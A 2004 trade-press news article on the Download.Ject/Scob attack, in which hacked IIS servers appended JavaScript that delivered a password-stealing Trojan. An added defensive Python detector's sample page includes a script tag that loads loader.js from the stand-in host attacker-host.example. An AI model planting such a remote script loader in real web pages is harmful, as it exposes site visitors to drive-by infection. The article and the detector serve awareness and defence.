Russia-based attack averted but sign of dark things to come

US government and industry experts voiced fears, in the week ending 25 June, of an impending massive attack that combined hacking, malcode injection and spamming. However, the attack was thwarted when Internet engineers shut down a Russian server that had been delivering the 'Padodor' Trojan and other malicious components.

F-Secure has said that the Trojan downloaded to PCs from compromised IIS servers was almost certainly the work of HangUP, whose trademark term, 'Padonok', was discovered in the code.

"Unless they provided their Padodor source code to someone else (which is doubtful), they are responsible for the latest Padodor/Qukart incidents," said F-Secure in a statement.

For sure, the attack is evidence of an underground trend that will not go away, as hackers turn home and corporate PCs into relay points for spam.

The attack ran like this. US-CERT declared itself aware, on 25 June, of 'new activity affecting compromised web sites running Microsoft's Internet Information Server (IIS) 5 and possibly end-user systems that visit these sites'.

The agency reported that 'compromised sites are appending JavaScript to the bottom of web pages' which, when executed, 'attempts to access a file hosted on another server. This file may contain malicious code that can affect the end-user's system'.

Once the hackers had broken into a site, files were modified and a Trojan downloader called 'Scob' or 'Download.Ject' was appended to them, causing Internet Explorer to execute it. The web site visitor did (and does) not have to click on any links: just visiting an infected site will trigger the exploit.
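As an added illustration from the defender's side (not part of the original article), a small Python check for the pattern US-CERT describes: a script element appended after the page's closing tag, or one that pulls code from a host other than the site's own. The sample pages, the site host name and the attacker host name are all constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    """Record every <script> start tag as ((line, col), src) and note
    where the closing </html> tag sits."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self.end_html_pos = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append((self.getpos(), dict(attrs).get("src")))

    def handle_endtag(self, tag):
        if tag == "html":
            self.end_html_pos = self.getpos()

def find_appended_scripts(page, site_host):
    """Flag scripts matching the Download.Ject pattern: placed after </html>
    (as an IIS document footer would do) or fetched from a foreign host."""
    parser = ScriptCollector()
    parser.feed(page)
    parser.close()
    findings = []
    for pos, src in parser.scripts:
        reasons = []
        if parser.end_html_pos is not None and pos > parser.end_html_pos:
            reasons.append("appended after </html>")
        host = urlparse(src).hostname if src else None  # relative src -> None
        if host and host.lower() != site_host.lower():
            reasons.append(f"loads from external host {host}")
        if reasons:
            findings.append({"pos": pos, "src": src, "reasons": reasons})
    return findings

# Constructed sample pages (not from the article): a clean page, then the same
# page with two scripts appended after </html>; host names are placeholders.
CLEAN_PAGE = (
    '<html><head><script src="/js/site.js"></script></head>\n'
    "<body><p>Welcome</p></body></html>\n"
)
INFECTED_PAGE = CLEAN_PAGE + (
    '<script src="http://attacker-host.example/loader.js"></script>\n'
    "<script>/* constructed inline placeholder */</script>\n"
)

if __name__ == "__main__":
    for finding in find_appended_scripts(INFECTED_PAGE, "www.example.com"):
        print(finding)
```

Run against a crawl of a site's own pages (or the files in its web root), the check points at the exact line where an appended script appears, which is what an administrator would want before deciding whether a rebuild is needed.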

The Trojan horse, which was surreptitiously downloaded to machines running Internet Explorer from infected Internet Information Services (IIS) servers, watched for log-in information for prominent sites such as PayPal, eBay, EarthLink and Yahoo, then attempted to steal confidential financial information, such as credit card numbers.

Still other reports say that the hackers behind the malware were actually loading computers with adware or spamware — software that can push unwanted ads to users or steal personal data for the purpose of spamming.

Phillip Hallam-Baker, principal scientist at VeriSign Security Services, commented that "the CERT description was somewhat unclear. It was reported as an IIS issue, but the description given mentioned JavaScript code being appended to web pages to attack customers. That would make it a description of an exploit, rather than a description of a vulnerability.

"What is significant here is that web site compromises have moved beyond merely vandalizing the site to victimizing the user of the site.

"The advisory is right to point out that people can protect themselves by turning off JavaScript, but unfortunately JavaScript use is widespread. I hope that people don't read the advisory and then conclude that security problems are the fault of the user."

Meanwhile, Microsoft said it was investigating a report of a security issue known as Download.Ject affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer. It urged web administrators to apply update 835732, which was addressed by MS04-011.

However, it is still unclear whether this will do the trick. The SANS Internet Storm Center said that several server administrators reported that they were fully patched, and yet also breached.

'We do not know at this point how the affected servers have been compromised', the Center's alert said on 25 June. 'The SSL-PCT exploit is at the top of our list of suspects. If you find a compromised server, we strongly recommend a complete rebuild. You may be able to get your web site back into business by changing the footer setting and removing the JavaScript file. But this is a very sophisticated attack and you should expect other stealthy backdoors.'

Hallam-Baker said that it was "unfortunate that this was reported as an IIS issue since it is a development that all Web server administrators should be aware of. Whatever server you are running, your site may be used to attack your customers if it is compromised."

Confusion was also rife over how widespread the infections were. According to Marty Lidner, an incident-handling team leader at the CERT Coordination Center: "CERT found infections on about 100 Web sites of varying sizes [on 27 June] and informed their operators of the problem. But many other Web sites are likely to be infected that CERT is unaware of."

Jay Heiser, analyst at TruSecure, said: "It is too early to really have a firm opinion on exactly what happened, and its significance. The dust hasn't cleared on this one yet.

"However, JavaScript, like virtually all other forms of mobile code, is not as carefully designed as Java itself, and is vulnerable to exploit. Microsoft's choice of integrating Internet-delivered mobile code with desktop capability has provided unprecedented levels of convenience and power … but this failure is typical of the types of failure that are inevitable with this model.

"We will continue to see failures like this, and it is reasonable to assume that some of them will be more serious than this latest one", he added.

Hallam-Baker commented that "organized crime is certainly involved in a large number of hacking attacks. This tends to be a tautology though since computer crimes typically involve several people. Certainly there are groups of hackers in several former USSR/eastern bloc countries who perform extortion rackets.

"Whoever is behind this appears to be interested in targeting ordinary users of the web. Regardless of the nationality, these appear to be dark forces."

By 9 July, Websense, an enterprise software firm, had discovered 114 web sites distributing the malicious JavaScript programme — two weeks after the first sighting. It's not over yet.

Brian McKenna, Infosecurity Today, July/August 2004

Photo caption: Hallam-Baker: dark forces at work